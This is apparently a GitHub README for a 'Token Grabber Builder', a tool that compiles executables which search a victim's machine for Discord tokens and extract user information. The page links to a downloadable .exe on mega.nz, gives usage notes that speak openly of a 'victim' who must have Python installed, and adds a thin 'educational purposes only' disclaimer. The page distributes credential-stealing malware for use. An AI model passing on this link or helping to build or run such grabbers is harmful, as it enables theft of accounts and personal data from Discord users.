SweetMoonSM/Token-Grabber-Builder/README.md

 [file .exe new version](https://mega.nz/file/FhNXnTLT#GA50Nig0K28PHhOiiIPy0fnoDvPY3LRVersZTiyHqes)
 # IMPORTANT
 YOU HAVE TO DOWNLOAD ALL ( OLD VERSION WITH NEW VERSION ) AND DELETE THE TOKEN GRABBER BUILDER.EXE ( OLD VERSION ) THEN USE THE NEW VERSION SO THAT'S THE FILE CAN WORKING

+Victim MUST have python ( no need package just only python ) then token grabber will WORKING
 # About :
 This tool should only be used for educational purposes only.
 Do not use this on others maliciously.
 This program demonstrates, in an easy GUI format, how token grabbers can be created and compiled to exe from a .py file.
 When this tool is used, it makes it easier to understand the process and methods of how the output .exe file searches for Discord tokens and the type of information it extracts from a user.